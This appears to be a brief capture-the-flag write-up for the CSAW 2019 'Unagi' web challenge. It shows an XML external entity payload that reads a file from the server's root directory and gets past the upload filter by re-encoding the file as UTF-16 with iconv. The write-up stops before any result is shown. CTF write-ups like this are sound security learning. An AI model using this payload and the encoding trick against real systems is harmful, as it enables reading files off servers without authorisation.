Article directory
[Web_Unagi] xxe injection filter bypass
Prompt that we need to upload files, and the flag is in the root directory,
The upload file format is:
<users>
<user>
<username>alice</username>
<password>passwd1</password>
<name>Alice</name>
<email>[email protected]</email>
<group>CSAW2019</group>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>[email protected]</email>
<group>CSAW2019</group>
</user>
</users>
Obviously use xxe injection
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>gg</username>
<password>passwd1</password>
<name>ggg</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
But uploaded and found that it was filtered, we need to find a way to bypass
Since the xml file supports UTF-16
encoding, we can convert the file toUTF-16
iconv -f UTF-8 -t UTF-16 1.xml > flag.xml
Then upload again: